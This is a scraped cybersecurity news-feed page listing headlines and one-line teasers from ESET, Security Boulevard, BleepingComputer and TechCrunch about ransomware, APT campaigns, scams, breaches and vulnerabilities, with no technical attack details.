The post Photos: Black Hat USA 2025 appeared first on Help Net Security.

Read More
ESET Threat Report H1 2025: ClickFix, infostealer disruptions, and ransomware deathmatch
ESET Threat Report H1 2025: ClickFix, infostealer disruptions, and ransomware deathmatch

Threat actors are embracing ClickFix, ransomware gangs are turning on each other – toppling even the leaders – and law enforcement is disrupting one infostealer after another

Read More
Is your phone spying on you? | Unlocked 403 cybersecurity podcast (S2E5)
Is your phone spying on you? | Unlocked 403 cybersecurity podcast (S2E5)

Here's what you need to know about the inner workings of modern spyware and how to stay away from apps that know too much

Read More
Why the tech industry needs to stand firm on preserving end-to-end encryption
Why the tech industry needs to stand firm on preserving end-to-end encryption

Restricting end-to-end encryption on a single-country basis would not only be absurdly difficult to enforce, but it would also fail to deter criminal activity

Read More
This month in security with Tony Anscombe – July 2025 edition
This month in security with Tony Anscombe – July 2025 edition

Here's a look at cybersecurity stories that moved the needle, raised the alarm, or offered vital lessons in July 2025

Read More
The hidden risks of browser extensions – and how to stay safe
The hidden risks of browser extensions – and how to stay safe

Not all browser add-ons are handy helpers – some may contain far more than you have bargained for

Read More
SharePoint under fire: ToolShell attacks hit organizations worldwide
SharePoint under fire: ToolShell attacks hit organizations worldwide

The ToolShell bugs are being exploited by cybercriminals and APT groups alike, with the US on the receiving end of 13 percent of all attacks

Read More
ToolShell: An all-you-can-eat buffet for threat actors
ToolShell: An all-you-can-eat buffet for threat actors

ESET Research has been monitoring attacks involving the recently discovered ToolShell zero-day vulnerabilities

Read More
Rogue CAPTCHAs: Look out for phony verification pages spreading malware
Rogue CAPTCHAs: Look out for phony verification pages spreading malware

Before rushing to prove that you're not a robot, be wary of deceptive human verification pages as an increasingly popular vector for delivering malware

Read More
Why is your data worth so much? | Unlocked 403 cybersecurity podcast (S2E4)
Why is your data worth so much? | Unlocked 403 cybersecurity podcast (S2E4)

Behind every free online service, there's a price being paid. Learn why your digital footprint is so valuable, and when you might actually be the product.

Read More
Unmasking AsyncRAT: Navigating the labyrinth of forks
Unmasking AsyncRAT: Navigating the labyrinth of forks

ESET researchers map out the labyrinthine relationships among the vast hierarchy of AsyncRAT variants

Read More
How to get into cybersecurity | Unlocked 403 cybersecurity podcast (S2E3)
How to get into cybersecurity | Unlocked 403 cybersecurity podcast (S2E3)

Cracking the code of a successful cybersecurity career starts here. Hear from ESET's Robert Lipovsky as he reveals how to break into and thrive in this fast-paced field.

Read More
Task scams: Why you should never pay to get paid
Task scams: Why you should never pay to get paid

Some schemes might sound unbelievable, but they’re easier to fall for than you think. Here’s how to avoid getting played by gamified job scams.

Read More
How government cyber cuts will affect you and your business
How government cyber cuts will affect you and your business

Deep cuts in cybersecurity spending risk creating ripple effects that will put many organizations at a higher risk of falling victim to cyberattacks

Read More
Gamaredon in 2024: Cranking out spearphishing campaigns against Ukraine with an evolved toolset
Gamaredon in 2024: Cranking out spearphishing campaigns against Ukraine with an evolved toolset

ESET Research analyzes Gamaredon’s updated cyberespionage toolset, new stealth-focused techniques, and aggressive spearphishing operations observed throughout 2024

Read More
ESET Threat Report H1 2025: Key findings
ESET Threat Report H1 2025: Key findings

ESET Chief Security Evangelist Tony Anscombe looks at some of the report's standout findings and their implications for organizations in 2025

Read More
ESET APT Activity Report Q4 2024–Q1 2025: Malware sharing, wipers and exploits
ESET APT Activity Report Q4 2024–Q1 2025: Malware sharing, wipers and exploits

ESET experts discuss Sandworm’s new data wiper, relentless campaigns by UnsolicitedBooker, attribution challenges amid tool-sharing, and other key findings from the latest APT Activity Report

Read More
This month in security with Tony Anscombe – June 2025 edition
This month in security with Tony Anscombe – June 2025 edition

From Australia's new ransomware payment disclosure rules to another record-breaking DDoS attack, June 2025 saw no shortage of interesting cybersecurity news

Read More
ESET Threat Report H1 2025
ESET Threat Report H1 2025

A view of the H1 2025 threat landscape as seen by ESET telemetry and from the perspective of ESET threat detection and research experts

Read More
BladedFeline: Whispering in the dark
BladedFeline: Whispering in the dark

ESET researchers analyzed a cyberespionage campaign conducted by BladedFeline, an Iran-aligned APT group with likely ties to OilRig

Read More
Don’t let dormant accounts become a doorway for cybercriminals
Don’t let dormant accounts become a doorway for cybercriminals

Do you have online accounts you haven't used in years? If so, a bit of digital spring cleaning might be in order.

Read More
This month in security with Tony Anscombe – May 2025 edition
This month in security with Tony Anscombe – May 2025 edition

From a flurry of attacks targeting UK retailers to campaigns corralling end-of-life routers into botnets, it's a wrap on another month filled with impactful cybersecurity news

Read More
Word to the wise: Beware of fake Docusign emails
Word to the wise: Beware of fake Docusign emails

Cybercriminals impersonate the trusted e-signature brand and send fake Docusign notifications to trick people into giving away their personal or corporate data

Read More
Danabot under the microscope
Danabot under the microscope

ESET Research has been tracking Danabot’s activity since 2018 as part of a global effort that resulted in a major disruption of the malware’s infrastructure

Read More
Danabot: Analyzing a fallen empire
Danabot: Analyzing a fallen empire

ESET Research shares its findings on the workings of Danabot, an infostealer recently disrupted in a multinational law enforcement operation

Read More
Lumma Stealer: Down for the count
Lumma Stealer: Down for the count

The bustling cybercrime enterprise has been dealt a significant blow in a global operation that relied on the expertise of ESET and other technology companies

Read More
ESET takes part in global operation to disrupt Lumma Stealer
ESET takes part in global operation to disrupt Lumma Stealer

Our intense monitoring of tens of thousands of malicious samples helped this global disruption operation

Read More
The who, where, and how of APT attacks in Q4 2024–Q1 2025
The who, where, and how of APT attacks in Q4 2024–Q1 2025

ESET Chief Security Evangelist Tony Anscombe highlights key findings from the latest issue of the ESET APT Activity Report

Read More
ESET APT Activity Report Q4 2024–Q1 2025
ESET APT Activity Report Q4 2024–Q1 2025

An overview of the activities of selected APT groups investigated and analyzed by ESET Research in Q4 2024 and Q1 2025

Read More
Sednit abuses XSS flaws to hit gov't entities, defense companies
Sednit abuses XSS flaws to hit gov't entities, defense companies

Operation RoundPress targets webmail software to steal secrets from email accounts belonging mainly to governmental organizations in Ukraine and defense contractors in the EU

Read More
Operation RoundPress
Operation RoundPress

ESET researchers uncover a Russia-aligned espionage operation targeting webmail servers via XSS vulnerabilities

Read More
How can we counter online disinformation? | Unlocked 403 cybersecurity podcast (S2E2)
How can we counter online disinformation? | Unlocked 403 cybersecurity podcast (S2E2)

Ever wondered why a lie can spread faster than the truth? Tune in for an insightful look at disinformation and how we can fight one of the most pressing challenges facing our digital world.

Read More
Catching a phish with many faces
Catching a phish with many faces

Here’s a brief dive into the murky waters of shape-shifting attacks that leverage dedicated phishing kits to auto-generate customized login pages on the fly

Read More
Beware of phone scams demanding money for ‘missed jury duty’
Beware of phone scams demanding money for ‘missed jury duty’

When we get the call, it’s our legal responsibility to attend jury service. But sometimes that call won’t come from the courts – it will be a scammer.

Read More
Toll road scams are in overdrive: Here’s how to protect yourself
Toll road scams are in overdrive: Here’s how to protect yourself

Have you received a text message about an unpaid road toll? Make sure you’re not the next victim of a smishing scam.

Read More
RSAC 2025 wrap-up – Week in security with Tony Anscombe
RSAC 2025 wrap-up – Week in security with Tony Anscombe

From the power of collaborative defense to identity security and AI, catch up on the event's key themes and discussions

Read More
TheWizards APT group uses SLAAC spoofing to perform adversary-in-the-middle attacks
TheWizards APT group uses SLAAC spoofing to perform adversary-in-the-middle attacks

ESET researchers analyzed Spellbinder, a lateral movement tool used to perform adversary-in-the-middle attacks

Read More
This month in security with Tony Anscombe – April 2025 edition
This month in security with Tony Anscombe – April 2025 edition

From the near-demise of MITRE's CVE program to a report showing that AI outperforms elite red teamers in spearphishing, April 2025 was another whirlwind month in cybersecurity

Read More
How safe and secure is your iPhone really?
How safe and secure is your iPhone really?

Your iPhone isn't necessarily as invulnerable to security threats as you may think. Here are the key dangers to watch out for and how to harden your device against bad actors.

Read More
Deepfake 'doctors' take to TikTok to peddle bogus cures
Deepfake 'doctors' take to TikTok to peddle bogus cures

Look out for AI-generated 'TikDocs' who exploit the public's trust in the medical profession to drive sales of sketchy supplements

Read More
How fraudsters abuse Google Forms to spread scams
How fraudsters abuse Google Forms to spread scams

The form and quiz-building tool is a popular vector for social engineering and malware. Here’s how to stay safe.

Read More
Will super-smart AI be attacking us anytime soon?
Will super-smart AI be attacking us anytime soon?

What practical AI attacks exist today? “More than zero” is the answer – and they’re getting better.

Read More
CapCut copycats are on the prowl
CapCut copycats are on the prowl

Cybercriminals lure content creators with promises of cutting-edge AI wizardry, only to attempt to steal their data or hijack their devices instead

Read More
They’re coming for your data: What are infostealers and how do I stay safe?
They’re coming for your data: What are infostealers and how do I stay safe?

Here's what to know about malware that raids email accounts, web browsers, crypto wallets, and more – all in a quest for your sensitive data

Read More
Attacks on the education sector are surging: How can cyber-defenders respond?
Attacks on the education sector are surging: How can cyber-defenders respond?

Academic institutions have a unique set of characteristics that makes them attractive to bad actors. What's the right antidote to cyber-risk?

Read More
Watch out for these traps lurking in search results
Watch out for these traps lurking in search results

Here’s how to avoid being hit by fraudulent websites that scammers can catapult directly to the top of your search results

Read More
So your friend has been hacked: Could you be next?
So your friend has been hacked: Could you be next?

When a ruse puts on a familiar face, your guard might drop, making you an easy mark. Learn how to tell a friend apart from a foe.

Read More
1 billion reasons to protect your identity online
1 billion reasons to protect your identity online

Corporate data breaches are a gateway to identity fraud, but they’re not the only one. Here’s a lowdown on how your personal data could be stolen – and how to make sure it isn’t.

Read More
The good, the bad and the unknown of AI: A Q&A with Mária Bieliková
The good, the bad and the unknown of AI: A Q&A with Mária Bieliková

The computer scientist and AI researcher shares her thoughts on the technology’s potential and pitfalls – and what may lie ahead for us

Read More
This month in security with Tony Anscombe – March 2025 edition
This month in security with Tony Anscombe – March 2025 edition

From an exploited vulnerability in a third-party ChatGPT tool to a bizarre twist on ransomware demands, it's a wrap on another month filled with impactful cybersecurity news

Read More
Resilience in the face of ransomware: A key to business survival
Resilience in the face of ransomware: A key to business survival

Your company’s ability to tackle the ransomware threat head-on can ultimately be a competitive advantage

Read More
Making it stick: How to get the most out of cybersecurity training
Making it stick: How to get the most out of cybersecurity training

Security awareness training doesn’t have to be a snoozefest – games and stories can help instill ‘sticky’ habits that will kick in when a danger is near

Read More
RansomHub affiliates linked to rival RaaS gangs
RansomHub affiliates linked to rival RaaS gangs

ESET researchers also examine the growing threat posed by tools that ransomware affiliates deploy in an attempt to disrupt EDR security solutions

Read More
FamousSparrow resurfaces to spy on targets in the US, Latin America
FamousSparrow resurfaces to spy on targets in the US, Latin America

Once thought to be dormant, the China-aligned group has also been observed using the privately-sold ShadowPad backdoor for the first time

Read More
Shifting the sands of RansomHub’s EDRKillShifter
Shifting the sands of RansomHub’s EDRKillShifter

ESET researchers discover new ties between affiliates of RansomHub and of rival gangs Medusa, BianLian, and Play

Read More
You will always remember this as the day you finally caught FamousSparrow
You will always remember this as the day you finally caught FamousSparrow

ESET researchers uncover the toolset used by the FamousSparrow APT group, including two undocumented versions of the group’s signature backdoor, SparrowDoor

Read More
Operation FishMedley
Operation FishMedley

ESET researchers detail a global espionage operation by FishMonger, the APT group run by I‑SOON

Read More
MirrorFace updates toolset, expands targeting to Europe
MirrorFace updates toolset, expands targeting to Europe

The group's Operation AkaiRyū begins with targeted spearphishing emails that use the upcoming World Expo 2025 in Osaka, Japan, as a lure

Read More
Operation AkaiRyū: MirrorFace invites Europe to Expo 2025 and revives ANEL backdoor
Operation AkaiRyū: MirrorFace invites Europe to Expo 2025 and revives ANEL backdoor

ESET researchers uncovered MirrorFace activity that expanded beyond its usual focus on Japan and targeted a Central European diplomatic institute with the ANEL backdoor

Read More
AI's biggest surprises of 2024 | Unlocked 403 cybersecurity podcast (S2E1)
AI's biggest surprises of 2024 | Unlocked 403 cybersecurity podcast (S2E1)

Here's what's been hot on the AI scene over the past 12 months, how it's changing the face of warfare, and how you can fight AI-powered scams

Read More
When IT meets OT: Cybersecurity for the physical world
When IT meets OT: Cybersecurity for the physical world

While relatively rare, real-world incidents impacting operational technology highlight that organizations in critical infrastructure can’t afford to dismiss the OT threat

Read More
Don’t let cybercriminals steal your Spotify account
Don’t let cybercriminals steal your Spotify account

Listen up, this is sure to be music to your ears – a few minutes spent securing your account today can save you a ton of trouble tomorrow

Read More
AI-driven deception: A new face of corporate fraud
AI-driven deception: A new face of corporate fraud

Malicious use of AI is reshaping the fraud landscape, creating major new risks for businesses

Read More
Kids behaving badly online? Here's what parents can do
Kids behaving badly online? Here's what parents can do

By taking time to understand and communicate the impact of undesirable online behavior, you can teach your kids an invaluable set of life lessons for a new digital age

Read More
Martin Rees: Post-human intelligence – a cosmic perspective | Starmus highlights
Martin Rees: Post-human intelligence – a cosmic perspective | Starmus highlights

Take a moment to think beyond our current capabilities and consider what might come next in the grand story of evolution

Read More
Threat Report H2 2024: Infostealer shakeup, new attack vector for mobile, and Nomani
Threat Report H2 2024: Infostealer shakeup, new attack vector for mobile, and Nomani

Big shifts in the infostealer scene, novel attack vector against iOS and Android, and a massive surge in investment scams on social media

Read More
Bernhard Schölkopf: Is AI intelligent? | Starmus highlights
Bernhard Schölkopf: Is AI intelligent? | Starmus highlights

With AI's pattern recognition capabilities well-established, Mr. Schölkopf's talk shifts the focus to a pressing question: what will be the next great leap for AI?

Read More
This month in security with Tony Anscombe – February 2025 edition
This month in security with Tony Anscombe – February 2025 edition

Ransomware payments trending down, the cyber-resilience gap facing SMBs, and APT groups embracing generative AI – it's a wrap on another month filled with impactful security news

Read More
Laurie Anderson: Building an ARK | Starmus highlights
Laurie Anderson: Building an ARK | Starmus highlights

The pioneering multi-media artist reveals the creative process behind her stage show called ARK, which challenges audiences to reflect on some of the most pressing issues of our times

Read More
Fake job offers target software developers with infostealers
Fake job offers target software developers with infostealers

A North Korea-aligned activity cluster tracked by ESET as DeceptiveDevelopment drains victims' crypto wallets and steals their login details from web browsers and password managers

Read More
DeceptiveDevelopment targets freelance developers
DeceptiveDevelopment targets freelance developers

ESET researchers analyzed a campaign delivering malware bundled with job interview challenges

Read More
No, you’re not fired – but beware of job termination scams
No, you’re not fired – but beware of job termination scams

Some employment scams take an unexpected turn as cybercriminals shift from “hiring” to “firing” staff

Read More
Katharine Hayhoe: The most important climate equation | Starmus highlights
Katharine Hayhoe: The most important climate equation | Starmus highlights

The atmospheric scientist makes a compelling case for a head-to-heart-to-hands connection as a catalyst for climate action

Read More
Gaming or gambling? Lifting the lid on in-game loot boxes
Gaming or gambling? Lifting the lid on in-game loot boxes

The virtual treasure chests and other casino-like rewards inside your children’s games may pose risks you shouldn’t play down

Read More
What is penetration testing? | Unlocked 403 cybersecurity podcast (ep. 10)
What is penetration testing? | Unlocked 403 cybersecurity podcast (ep. 10)

Ever wondered what it's like to hack for a living – legally? Learn about the art and thrill of ethical hacking and how white-hat hackers help organizations tighten up their security.

Read More
How AI-driven identity fraud is causing havoc
How AI-driven identity fraud is causing havoc

Deepfake fraud, synthetic identities, and AI-powered scams make identity theft harder to detect and prevent – here's how to fight back

Read More
Neil Lawrence: What makes us unique in the age of AI | Starmus highlights
Neil Lawrence: What makes us unique in the age of AI | Starmus highlights

As AI advances at a rapid clip, reshaping industries, automating tasks, and redefining what machines can achieve, one question looms large: what remains uniquely human?

Read More
Patch or perish: How organizations can master vulnerability management
Patch or perish: How organizations can master vulnerability management

Don’t wait for a costly breach to provide a painful reminder of the importance of timely software patching

Read More
Roeland Nusselder: AI will eat all our energy, unless we make it tiny | Starmus highlights
Roeland Nusselder: AI will eat all our energy, unless we make it tiny | Starmus highlights

Left unchecked, AI's energy and carbon footprint could become a significant concern. Can our AI systems be far less energy-hungry without sacrificing performance?

Read More
How scammers are exploiting DeepSeek's rise
How scammers are exploiting DeepSeek's rise

As is their wont, cybercriminals waste no time launching attacks that aim to cash in on the frenzy around the latest big thing – plus, what else to know before using DeepSeek

Read More
This month in security with Tony Anscombe – January 2025 edition
This month in security with Tony Anscombe – January 2025 edition

DeepSeek’s bursting onto the AI scene, apparent shifts in US cybersecurity policies, and a massive student data breach all signal another eventful year in cybersecurity and data privacy

Read More
Untrustworthy AI: How to deal with data poisoning
Untrustworthy AI: How to deal with data poisoning

You should think twice before trusting your AI assistant, as database poisoning can markedly alter its output – even dangerously so

Read More
Brian Greene: Until the end of time | Starmus highlights
Brian Greene: Until the end of time | Starmus highlights

The renowned physicist explores how time and entropy shape the evolution of the universe, the nature of existence, and the eventual fate of everything, including humanity

Read More
Going (for) broke: 6 common online betting scams and how to avoid them
Going (for) broke: 6 common online betting scams and how to avoid them

Don’t roll the dice on your online safety – watch out for bogus sports betting apps and other traps commonly set by scammers

Read More
The evolving landscape of data privacy: Key trends to shape 2025
The evolving landscape of data privacy: Key trends to shape 2025

Incoming laws, combined with broader developments on the threat landscape, will create further complexity and urgency for security and compliance teams

Read More
PlushDaemon compromises supply chain of Korean VPN service
PlushDaemon compromises supply chain of Korean VPN service

ESET researchers have discovered a supply-chain attack against a VPN provider in South Korea by a new China-aligned APT group we have named PlushDaemon

Read More
Under lock and key: Protecting corporate data from cyberthreats in 2025
Under lock and key: Protecting corporate data from cyberthreats in 2025

Data breaches can cause a loss of revenue and market value as a result of diminished customer trust and reputational damage

Read More
UEFI Secure Boot: Not so secure
UEFI Secure Boot: Not so secure

ESET researchers uncover a vulnerability in a UEFI application that could enable attackers to deploy malicious bootkits on unpatched systems

Read More
Under the cloak of UEFI Secure Boot: Introducing CVE-2024-7344
Under the cloak of UEFI Secure Boot: Introducing CVE-2024-7344

The story of a signed UEFI application allowing a UEFI Secure Boot bypass

Read More
Cybersecurity and AI: What does 2025 have in store?
Cybersecurity and AI: What does 2025 have in store?

In the hands of malicious actors, AI tools can enhance the scale and severity of all manner of scams, disinformation campaigns and other threats

Read More
Protecting children online: Where Florida’s new law falls short
Protecting children online: Where Florida’s new law falls short

Some of the state’s new child safety law can be easily circumvented. Should it have gone further?

Read More
Crypto is soaring, but so are threats: Here’s how to keep your wallet safe
Crypto is soaring, but so are threats: Here’s how to keep your wallet safe

As detections of cryptostealers surge across Windows, Android and macOS, it's time for a refresher on how to keep your bitcoin or other crypto safe

Read More
State-aligned actors are increasingly deploying ransomware – and that’s bad news for everyone
State-aligned actors are increasingly deploying ransomware – and that’s bad news for everyone

The blurring of lines between cybercrime and state-sponsored attacks underscores the increasingly fluid and multifaceted nature of today’s cyberthreats

Read More
AI moves to your PC with its own special hardware
AI moves to your PC with its own special hardware

Seeking to keep sensitive data private and accelerate AI workloads? Look no further than AI PCs powered by Intel Core Ultra processors with a built-in NPU.

Read More
Gary Marcus: Taming Silicon Valley | Starmus highlights
Gary Marcus: Taming Silicon Valley | Starmus highlights

The prominent AI researcher explores the societal impact of artificial intelligence and outlines his vision for a future in which AI upholds human rights, dignity, and fairness

Read More
This month in security with Tony Anscombe – December 2024 edition
This month in security with Tony Anscombe – December 2024 edition

From attacks leveraging new new zero-day exploits to a major law enforcement crackdown, December 2024 was packed with impactful cybersecurity news

Read More
Chris Hadfield: The sky is falling – what to do about space junk? | Starmus highlights
Chris Hadfield: The sky is falling – what to do about space junk? | Starmus highlights

The first Canadian to walk in space dives deep into the origins of space debris, how it’s become a growing problem, and how we can clean up the orbital mess

Read More
ESET Research Podcast: Telekopye, again
ESET Research Podcast: Telekopye, again

Take a peek into the murky world of cybercrime where groups of scammers who go by the nickname of 'Neanderthals’ wield the Telekopye toolkit to ensnare unsuspecting victims they call 'Mammoths'

Read More
Unwrapping Christmas scams | Unlocked 403 cybersecurity podcast (special edition)
Unwrapping Christmas scams | Unlocked 403 cybersecurity podcast (special edition)

ESET's Jake Moore reveals why the holiday season is a prime time for scams, how fraudsters prey on victims, and how AI is supercharging online fraud

Read More
Cybersecurity is never out-of-office: Protecting your business anytime, anywhere
Cybersecurity is never out-of-office: Protecting your business anytime, anywhere

While you're enjoying the holiday season, cybercriminals could be gearing up for their next big attack – make sure your company's defenses are ready, no matter the time of year

Read More
ESET Threat Report H2 2024: Key findings
ESET Threat Report H2 2024: Key findings

ESET Chief Security Evangelist Tony Anscombe looks at some of the report's standout findings and their implications for staying secure in 2025

Read More
Ransomware: Still Dangerous After All These Years
Ransomware: Still Dangerous After All These Years

ransomware, attacks,

Ransomware isn’t dying — it’s evolving, swapping encryption for aggressive extortion as attacks and data theft hit record highs.

The post Ransomware: Still Dangerous After All These Years appeared first on Security Boulevard.

Read More
Stop Geo-Spoofing with Secure API Integration for Mobile Application
Stop Geo-Spoofing with Secure API Integration for Mobile Application

Location Spoofing or Geo Spoofing is the act of deliberately falsifying the geographical location of a device. This can be performed using various techniques such as GPS manipulation, tweaking OS settings, or by using specialized software that tricks apps into reporting incorrect location data. 

The post Stop Geo-Spoofing with Secure API Integration for Mobile Application appeared first on Security Boulevard.

Read More
Silent Guardian of Your Codebase: The Role of SAST
Silent Guardian of Your Codebase: The Role of SAST

In 2025, the average cost of a data breach reached an alarming Rs 22 Crore; a 13% increase from the previous year. This trend highlights how breaches are not only more frequent and sophisticated but also increasingly costly, putting an organization’s reputation and finances at risk. To combat these threats, companies are investing in robust […]

The post Silent Guardian of Your Codebase: The Role of SAST appeared first on Kratikal Blogs.

The post Silent Guardian of Your Codebase: The Role of SAST appeared first on Security Boulevard.

Read More
Decoding OTP A Deep Dive into HOTP and TOTP Algorithms
Decoding OTP A Deep Dive into HOTP and TOTP Algorithms

Explore OTP generation algorithms like HOTP and TOTP. Understand their differences, security, and implementation for robust authentication in CIAM and passwordless systems.

The post Decoding OTP A Deep Dive into HOTP and TOTP Algorithms appeared first on Security Boulevard.

Read More
CMMC Final Rule: Clear Steps for DoD Contractors
CMMC Final Rule: Clear Steps for DoD Contractors

Key Takeaways Understanding the CMMC Final Rule: Why It Matters Now For years, the Cybersecurity Maturity Model Certification (CMMC) has been discussed as a future requirement for defense contractors. But until recently, it served as a framework under development, not enforceable by law. That changed in October 2024, when the Department of Defense (DoD) published […]

The post CMMC Final Rule: Clear Steps for DoD Contractors appeared first on Centraleyes.

The post CMMC Final Rule: Clear Steps for DoD Contractors appeared first on Security Boulevard.

Read More
Reveal Security Unveils Preemptive Approach to Securing Applications and Cloud Services
Reveal Security Unveils Preemptive Approach to Securing Applications and Cloud Services

Reveal Security this week unfurled a platform designed to enable cybersecurity teams to preemptively manage access to multiple applications and cloud infrastructure resources both before and after end users have logged in. Company CEO Kevin Hanes said the Reveal Platform takes advantage of machine and deep learning algorithms to identify normal login behavior without having..

The post Reveal Security Unveils Preemptive Approach to Securing Applications and Cloud Services appeared first on Security Boulevard.

Read More
How to Build an Incident Response Playbook in 9 Steps
How to Build an Incident Response Playbook in 9 Steps

The post How to Build an Incident Response Playbook in 9 Steps  appeared first on AI Security Automation.

The post How to Build an Incident Response Playbook in 9 Steps  appeared first on Security Boulevard.

Read More
Data Center Security
Data Center Security

In an era where data is the lifeblood of every enterprise, safeguarding the core of your digital operations—the data center—is absolutely non-negotiable. With cyber threats evolving, regulations tightening, and infrastructure growing more complex, data center security is the pillar of business continuity, trust, and reputation. At Seceon, we understand this better than anyone, which is

The post Data Center Security appeared first on Seceon Inc.

The post Data Center Security appeared first on Security Boulevard.

Read More
Inside Kasada: An Intern’s Dive into Bots, Data, and Company Culture
Inside Kasada: An Intern’s Dive into Bots, Data, and Company Culture

Meet Max and Kasey, two interns at Kasada who tackled real-world challenges from two very different angles—machine learning and sales operations—and came away with sharper skills, meaningful impact, and a clear sense of where they’re headed next.

The post Inside Kasada: An Intern’s Dive into Bots, Data, and Company Culture appeared first on Security Boulevard.

Read More
Cloud Network Security
Cloud Network Security

Cloud Network Security refers to the set of policies, technologies, tools, and best practices designed to protect data, applications, and systems that are hosted in the cloud from unauthorized access, cyberattacks, and data breaches. As businesses accelerate their shift to digital-first models, cloud infrastructures have become the backbone of operations. From hybrid clouds to containerized

The post Cloud Network Security appeared first on Seceon Inc.

The post Cloud Network Security appeared first on Security Boulevard.

Read More
Royal and BlackSuit ransomware gangs hit over 450 US companies
Royal and BlackSuit ransomware gangs hit over 450 US companies

The U.S. Department of Homeland Security (DHS) says the cybercrime gang behind the Royal and BlackSuit ransomware operations had breached hundreds of U.S. companies before their infrastructure was dismantled last month. [...]

Read More
Fake WhatsApp developer libraries hide destructive data-wiping code
Fake WhatsApp developer libraries hide destructive data-wiping code

Two malicious NPM packages posing as WhatsApp development tools have been discovered deploying destructive data-wiping code that recursively deletes files on a developer's computers. [...]

Read More
CISA orders fed agencies to patch new Exchange flaw by Monday
CISA orders fed agencies to patch new Exchange flaw by Monday

CISA has issued an emergency directive ordering all Federal Civilian Executive Branch (FCEB) agencies to mitigate a critical Microsoft Exchange hybrid vulnerability tracked as CVE-2025-53786 by Monday morning at 9:00 AM ET. [...]

Read More
ChatGPT's GPT-5 models released: everything you need to know
ChatGPT's GPT-5 models released: everything you need to know

After a long wait, GPT-5 is finally rolling out. It's available for free, Plus, Pro and Team users today. This means everyone gets to try GPT-5 today, but paid users get higher limits. [...]

Read More
New EDR killer tool used by eight different ransomware groups
New EDR killer tool used by eight different ransomware groups

A new Endpoint Detection and Response (EDR) killer that is considered to be the evolution of 'EDRKillShifter,' developed by RansomHub, has been observed in attacks by eight different ransomware gangs. [...]

Read More
Bouygues Telecom confirms data breach impacting 6.4 million customers
Bouygues Telecom confirms data breach impacting 6.4 million customers

Bouygues Telecom warns it suffered a data breach after the personal information of 6.4 million customers was exposed in a cyberattack. [...]

Read More
SonicWall finds no SSLVPN zero-day, links ransomware attacks to 2024 flaw
SonicWall finds no SSLVPN zero-day, links ransomware attacks to 2024 flaw

SonicWall says that recent Akira ransomware attacks exploiting Gen 7 firewalls with SSLVPN enabled are exploiting an older vulnerability rather than a zero-day flaw. [...]

Read More
Wave of 150 crypto-draining extensions hits Firefox add-on store
Wave of 150 crypto-draining extensions hits Firefox add-on store

A malicious campaign dubbed 'GreedyBear' has snuck onto the Mozilla add-ons store, targeting Firefox users with 150 malicious extensions and stealing an estimated $1,000,000 from unsuspecting victims. [...]

Read More
Cryptomixer founders pled guilty to laundering money for cybercriminals
Cryptomixer founders pled guilty to laundering money for cybercriminals

The founders of the Samourai Wallet (Samourai) cryptocurrency mixer have pleaded guilty to laundering over $200 million for criminals. [...]

Read More
Massive IPTV piracy service with 28,000 channels taken offline
Massive IPTV piracy service with 28,000 channels taken offline

The Alliance for Creativity and Entertainment (ACE) announced the shutdown of Rare Breed TV, a major illegal IPTV service provider, after reaching a financial settlement with its operators. [...]

Read More
Air France and KLM disclose data breaches impacting customers
Air France and KLM disclose data breaches impacting customers

Air France and KLM announced on Wednesday that attackers had breached a customer service platform and stolen the data of an undisclosed number of customers. [...]

Read More
Microsoft warns of high-severity flaw in hybrid Exchange deployments
Microsoft warns of high-severity flaw in hybrid Exchange deployments

Microsoft has warned customers to mitigate a high-severity vulnerability in Exchange Server hybrid deployments that could allow attackers to escalate privileges in Exchange Online cloud environments undetected. [...]

Read More
Microsoft accidentally confirms GPT-5, GPT-5-Mini, GPT-5-Nano ahead of launch
Microsoft accidentally confirms GPT-5, GPT-5-Mini, GPT-5-Nano ahead of launch

OpenAI is hosting a live stream at 10AM PT to announce GPT-5, but Microsoft has already confirmed the details. [...]

Read More
Proton releases a new app for two-factor authentication
Proton releases a new app for two-factor authentication

Proton has a free authenticator app, which is available cross-platform with end-to-end encryption protection for data.

Read More
Knox lands $6.5M to compete with Palantir in the federal compliance market
Knox lands $6.5M to compete with Palantir in the federal compliance market

Irina Denisenko, CEO of Knox, launched Knox, a federal managed cloud provider, last year with a mission to help software vendors speed through the FedRAMP security authorization process in just three months, and at a fraction of what it would cost to do it on their own.

Read More
Google is adding new device-level features for its Advanced Protection program
Google is adding new device-level features for its Advanced Protection program

At the Android Show, taking place ahead of Google I/O 2025, Google announced that it is adding new device-specific features to its Advanced Protection program, which is designed to protect public figures such as politicians and journalists from different digital threats, with the Android 16 release. The new features include a new way of storing […]

Read More
Google announces new security features for Android for protection against scam and theft
Google announces new security features for Android for protection against scam and theft

At the Android Show on Tuesday, ahead of Google I/O, Google announced new security and privacy features for Android. These new features include new protections for calls, screen sharing, messages, device access, and system-level permissions. With these features, Google aims to protect users from falling for a scam, keep their details secure in case a […]

Read More
A 25-year-old police drone founder just raised $75M led by Index
A 25-year-old police drone founder just raised $75M led by Index

If you ever call 911 from an area that’s hard to get to, you might hear the buzz of a drone well before a police cruiser pulls up. And there’s a good chance that it will be one made by Brinc Drones, a Seattle-based startup founded by 25-year-old Blake Resnick, who dropped out of college […]

Read More
A new security fund opens up to help protect the fediverse
A new security fund opens up to help protect the fediverse

A new security fund aims to help apps in the fediverse — like Mastodon, Threads, and Pixelfed — to pay researchers for disclosing security bugs.

Read More
How to tell if your online accounts have been hacked
How to tell if your online accounts have been hacked

This is a guide on how to check whether someone compromised your online accounts.

Read More
Hackers are ramping up attacks using year-old ServiceNow security bugs to target unpatched systems
Hackers are ramping up attacks using year-old ServiceNow security bugs to target unpatched systems

Threat intelligence startup GreyNoise says it has observed a ‘notable resurgence’ in attack activity

Read More
US teachers’ union says hackers stole sensitive personal data on over 500,000 members
US teachers’ union says hackers stole sensitive personal data on over 500,000 members

PSEA says it "took steps to ensure" its stolen data was deleted, suggesting a ransom demand was paid

Read More
CISA scrambles to contact fired employees after court rules layoffs ‘unlawful’
CISA scrambles to contact fired employees after court rules layoffs ‘unlawful’

Federal court rules U.S. cybersecurity agency must re-hire over 100 former employees

Read More
DOGE axes CISA ‘red team’ staffers amid ongoing federal cuts
DOGE axes CISA ‘red team’ staffers amid ongoing federal cuts

Affected staff say more than 100 employees working to protect U.S. government networks were ‘axed’ with no prior warning

Read More
What PowerSchool won’t say about its data breach affecting millions of students
What PowerSchool won’t say about its data breach affecting millions of students

New details have emerged about PowerSchool's data breach — but here's what PowerSchool still isn't saying.

Read More
Hacker accessed PowerSchool’s network months before massive December breach
Hacker accessed PowerSchool’s network months before massive December breach

CrowdStrike says a hacker had access to PowerSchool's internal system as far back as August.

Read More
